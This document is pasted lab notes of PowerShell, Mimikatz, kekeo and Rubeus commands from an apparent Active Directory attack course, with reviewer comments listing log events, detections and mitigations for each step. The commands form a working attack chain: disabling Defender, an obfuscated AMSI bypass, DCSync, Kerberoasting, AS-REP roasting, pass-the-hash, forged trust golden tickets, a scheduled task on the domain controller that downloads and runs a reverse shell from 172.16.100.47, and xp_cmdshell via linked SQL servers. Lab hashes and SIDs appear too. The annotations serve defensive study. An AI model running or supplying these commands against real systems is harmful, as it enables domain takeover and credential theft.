PS Commands
# Lab notes pasted from a gist: the trailing "| |" on every line is rendering
# residue from the gist table, not PowerShell, and several commands are
# line-wrapped or truncated by the paste. The comments below are reviewer
# annotations from a defensive angle: what each step leaves in logs and which
# control stops it. Nothing here has been re-run or validated.

# PowerShell remoting into Server1 (note the en dash in "–Computername" is a
# transcription defect; PowerShell expects "-ComputerName"). WinRM sessions are
# logged on the target (Microsoft-Windows-WinRM/Operational) and a 4624 logon;
# JEA-constrained endpoints limit what such a session can do.
$session=New-PSSession –Computername Server1 | |
Enter-PSSession $session | |
# Turning off Defender real-time monitoring is a high-fidelity alert on its own
# (Windows Defender Operational log, event 5001); Tamper Protection blocks the
# call outright.
Set-MpPreference -DisableRealtimeMonitoring $true | |
# Enumerating the effective AppLocker policy and the session's language mode:
# these are the controls being probed, so AppLocker in enforce mode plus
# Constrained Language Mode is the mitigation, and Get-AppLockerPolicy use by
# non-admins is worth a detection rule.
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections | |
$ExecutionContext.SessionState.LanguageMode | |
#Enum Applocker policy if you stumble upon constrained language mode | |
# Writing into a remote admin share (c$) needs local admin on the target and
# shows up there as a network logon (4624 type 3) plus share access
# (5140/5145 when object access auditing for file shares is enabled).
Copy-Item .\Invoke-MimikatzEx.ps1 \\dcorpadminsrv.dollarcorp.moneycorp.local\c$\'Program Files' | |
Copy-Item <Path> <Destination>\c$\'Program Files' | |
# kekeo: a TGT requested with an RC4 key (over-pass-the-hash) and then an
# S4U ticket, i.e. constrained-delegation abuse. Detection: 4768 with
# encryption type 0x17 (RC4) for an account that normally uses AES, and 4769
# S4U requests from an unexpected host. Mitigation: remove delegation that is
# not needed and mark sensitive accounts "cannot be delegated" / AES-only.
# Lines from "tgs::s4u" through "/service:..." are one wrapped command.
#Ask for TGT from server using kekeo | |
tgt::ask /user:websvc /domain:dollarcorp.moneycorp.local /rc4:cc098f204c5887eaa8253e7c2749156f | |
#Ask for a TGS | |
tgs::s4u /tgt:[email protected]_krbtgt~dollarcorp.moneycorp.local@DOLLAR | |
CORP.MONEYCORP.LOCAL.kirbi /user:[email protected] | |
/service:time/dcorp-dc.dollarcorp.moneycorp.LOCAL|ldap/dcorpdc.dollarcorp.moneycorp.LOCAL | |
# Pass-the-ticket: the .kirbi is imported into the current logon session
# (wrapped over three lines). Imported tickets are visible with klist; a 4769
# service-ticket use with no matching 4768 on this host is one indicator.
#PASS THE TICKET USING MIMKATZ | |
Invoke-Mimikatz -Command '"kerberos::ptt | |
[email protected]@DOLLARCORP.MONEYCORP.LOCAL_ldap~ | |
[email protected]_ALT.kirbi"' | |
# NOTE(review): despite the "dump lsass" label, this is DCSync, not an lsass
# dump. It needs replication rights on the domain and produces a 4662 on the DC
# with the DS-Replication-Get-Changes(-All) control access rights from an
# account that is not a DC; that event from a non-DC principal is the alert.
#dump lsass | |
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"' | |
# Remote WMI query against the DC; appears there as a 4624 type 3 logon.
gwmi -Class win32_computersystem -ComputerName dcorpdc.dollarcorp.moneycorp.local | |
# Kerberoasting: list user accounts with SPNs, then request a service ticket
# for one of them (the New-Object line is truncated in the paste). Detection
# is 4769 with ticket encryption 0x17 for a user-account SPN; mitigation is
# gMSA or long random passwords for service accounts and AES-only SPNs.
# find out services running with user accounts as the services running with machine accounts have difficult passwords | |
Get-NetUser -SPN | |
# Request ticket for the service | |
Add-Type -AssemblyNAme System.IdentityModel | |
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.loca | |
# AS-REP roasting: 4194304 (0x400000) is the DONT_REQ_PREAUTH flag of
# userAccountControl. Setting it requires write access on the target object
# and is logged as 4738 (user account changed) / 5136 (directory object
# modified); the later AS-REP request shows as 4768 with Pre-Authentication
# Type 0. "@ {" with a space is a transcription defect (PowerShell needs "@{").
Get-DomainUser -PreauthNotRequired -Verbose | |
Set-DomainObject -Identity ControlXUser -XOR @ {useraccountcontrol=4194304} -Verbose | |
Get-DomainUser -PreauthNotRequired -Verbose -Identity Control47User | |
Get-ASREPHash -UserName VPN1user -Verbose | |
# Bare UNC paths, presumably hosts noted for the pth command below (inferred).
\\dcorp-dc.dollarcorp.moneycorp.local | |
# Pass-the-hash: sekurlsa::pth starts a process under an alternate credential.
# On the source it is a 4624 logon type 9 (NewCredentials); on the target an
# NTLM network logon (4624 type 3, authentication package NTLM). Credential
# Guard / LSA protection and disabling NTLM where possible are the controls.
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dcorpdc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /run:powershell.exe"' | |
\\dcorp-appsrv.dollarcorp.moneycorp.local | |
# Remote scheduled task run/creation on the DC: 4698 (task created) and
# 4702 (task updated) on the target, and the task action is a PowerShell
# download cradle reaching out to 172.16.100.47 — both high-signal on a DC.
schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "black47" | |
schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "black47" /TR "powershell.exe -c 'iex(New-Object Net.WebClient).DownloadString(''http://172.16.100.47/Invoke-PowerShellTcp.ps1''')'';Power -Reverse -IPAddress 172.16.100.47 -Port 4444" | |
# Obfuscated AMSI bypass: string-format and backtick obfuscation resolving to
# the amsiInitFailed field set via reflection. Script block logging (4104)
# records the de-obfuscated block, and the backtick/"-f" concatenation style
# is itself a common detection heuristic.
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} ) | |
# Same Defender switch as above; same event 5001 / Tamper Protection note.
Set-MpPreference -DisableRealtimeMonitoring $true | |
# DCSync of the trust account (mcorp$) recovers the inter-realm trust key that
# the forged trust tickets below depend on; same 4662 detection as above.
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\mcorp$"' | |
# Values recorded from the exercise (trust key, domain SID, Enterprise Admins
# SIDs ending in RID 519) that feed the golden/trust-ticket commands below.
Trust token - 776b4d2c86b0dd0c79cab6511728264f | |
domain sid - S-1-5-21-1874506631-3219952063-538504511 | |
EA - SIDS - S-1-5-21-280534878-1496970234-700767426-519 | |
EU EA SIDS - S-1-5-21-1652071801-3219952063-98612180-519 | |
# Forged inter-realm TGT with /sids set to the parent/other forest's
# Enterprise Admins SID: SID-history abuse across a trust. Mitigation is SID
# filtering on the trust (netdom trust ... /quarantine:yes) and selective
# authentication; detection is 4624/4769 on the trusting side where the SID
# history field carries a RID-519 SID from a foreign domain. In the second
# golden command "/sid: S-1-5..." has a stray space after the colon.
Get-NetGroup -Domain moneycorp.local -GroupName "Enterprise Admins" -FullData | |
Invoke-Mimikatz -Command '"lsadump::trust /patch"' | |
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:776b4d2c86b0dd0c79cab6511728264f /service:krbtgt /target:eurocorp.local /ticket:C:\AD\Tools\kekeo_old\trust_tkt.kirbi"' | |
# Exchanging the forged trust ticket for a CIFS service ticket on the parent
# DC and injecting it (Rubeus, then the older asktgs/kirbikator pair below).
\Rubeus.exe asktgs /ticket:C:trust_tkt.kirbi /service:cifs/mcorp-dc.moneycorp.local /dc:mcorpdc.moneycorp.local /ptt | |
Invoke-Mimikatz -Command '"lsadump::trust /patch"' | |
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid: S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:433e7fd056a2b3512efb341590d7c436 /service:krbtgt /target:moneycorp.local /ticket:C:\AD\Tools\kekeo_old\trust_tkt.kirbi"' | |
# Grants student47 access to the root\cimv2 WMI namespace on the DC: a
# DACL-based persistence change. Namespace security is rarely baselined;
# presumably worth periodic comparison of WMI namespace ACLs on DCs — verify.
Set-RemoteWMI -SamAccountName student47 -ComputerName dcorpdc.dollarcorp.moneycorp.local -namespace 'root\cimv2' -Verbose | |
\asktgs.exe C:\AD\Tools\kekeo_old\trust_tkt.kirbi CIFS/mcorp-dc.moneycorp.local | |
.\kirbikator.exe lsa .\CIFS.mcorp-dc.moneycorp.local.kirbi | |
# Success check: listing C$ on the parent-forest DC with the injected ticket.
ls \\mcorp-dc.moneycorp.local\c$ | |
# Linked-server crawling ending in xp_cmdshell on a remote instance (the
# final openquery line has unbalanced quotes/parentheses in the paste).
# Hardening: disable xp_cmdshell, map linked-server logins to least
# privilege rather than sa, and disable RPC Out where not needed; SQL Server
# Audit on xp_cmdshell execution gives the detection.
Get-SQLServerLink -Instance dcorp-mssql -Verbose | |
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Verbose | |
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'whoami'" | |
select * from openquery("dcorp-sql1",'select * from openquery("dcorpm-gmt",''select * from openquery("eu-sql.eu.eurocorp.local",''''select @@version as version;exec master..xp_cmdshell "powershell whoami)'''')'')') |